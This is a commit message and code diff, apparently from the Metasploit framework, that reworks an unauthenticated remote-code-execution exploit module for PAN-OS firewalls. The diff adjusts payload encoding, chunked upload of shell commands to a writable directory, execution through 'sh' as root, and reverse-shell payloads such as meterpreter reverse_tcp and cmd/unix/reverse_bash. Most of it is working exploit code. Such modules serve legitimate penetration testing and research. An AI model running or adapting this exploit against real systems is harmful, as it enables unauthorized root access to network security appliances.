The payload we essentially being encoded twice (thanks for calling this out Brendan), we now supply a suitable BadChars and let the framewrk encode the framework paylaod. We rename the variable payload to bootstrap_payload as this was colliding with the frameworks payload variable which was not the intent.

Author: sfewer-r7

documentation/modules/exploit/linux/http/panos_management_unauth_rce.md

@@ -18,7 +18,8 @@ run the exploit against the target. The default user is `admin` with a password
 to change this upon logging in for the first time.
 
 The exploit has been tested against PAN-OS `10.2.8` and `11.1.4`, with the
-payload `cmd/linux/http/x64/meterpreter_reverse_tcp`.
+payloads `cmd/linux/http/x64/meterpreter_reverse_tcp`, `md/linux/http/x64/meterpreter/reverse_tcp`,
+and `cmd/unix/reverse_bash`.
 
 ## Verification Steps
 

modules/exploits/linux/http/panos_management_unauth_rce.rb

@@ -43,8 +43,17 @@ def initialize(info = {})
         'Platform' => [ 'linux', 'unix' ],
         'Arch' => [ARCH_CMD],
         'Privileged' => true, # Executes as root on Linux
-        'Targets' => [ [ 'Default', {} ] ],
-        # NOTE: Tested with the payload: cmd/linux/http/x64/meterpreter_reverse_tcp
+        'Targets' => [
+          [
+            'Default', {
+              'Payload' => { 'BadChars' => '\\\'"&' }
+            }
+          ]
+        ],
+        # NOTE: Tested with the payloads:
+        #   cmd/linux/http/x64/meterpreter_reverse_tcp
+        #   cmd/linux/http/x64/meterpreter/reverse_tcp
+        #   cmd/unix/reverse_bash
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true,
@@ -109,23 +118,22 @@ def check
   def exploit
     tmp_file_name = Rex::Text.rand_text_alphanumeric(4)
 
-    cmd = "rm -f #{datastore['WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}"
-
-    payload = Base64.strict_encode64(cmd)
+    bootstrap_payload = "rm -f #{datastore['WRITABLE_DIR']}/#{tmp_file_name}*;#{payload.encoded}"
 
     idx = 1
 
     chunk_size = 30
 
-    max_idx = (payload.length / chunk_size) + 1
+    max_idx = (bootstrap_payload.length / chunk_size) + 1
 
-    while payload && !payload.empty?
+    while bootstrap_payload && !bootstrap_payload.empty?
 
       print_status("Uploading payload chunk #{idx} of #{max_idx}...")
 
-      chunk = payload[0, chunk_size]
+      chunk = bootstrap_payload[0, chunk_size]
 
-      payload = payload[chunk_size..]
+      bootstrap_payload = bootstrap_payload[chunk_size..]
+      print_status(chunk.inspect)
 
       execute_cmd("echo -n '#{chunk}'>#{datastore['WRITABLE_DIR']}/#{tmp_file_name}#{idx}")
 
@@ -138,7 +146,7 @@ def exploit
 
     print_status('Executing payload...')
 
-    execute_cmd("cat #{datastore['WRITABLE_DIR']}/#{tmp_file_name} | base64 -d | sh", dontfail: true)
+    execute_cmd("cat #{datastore['WRITABLE_DIR']}/#{tmp_file_name}|sh", dontfail: true)
   end
 
   def execute_cmd(cmd, dontfail: false)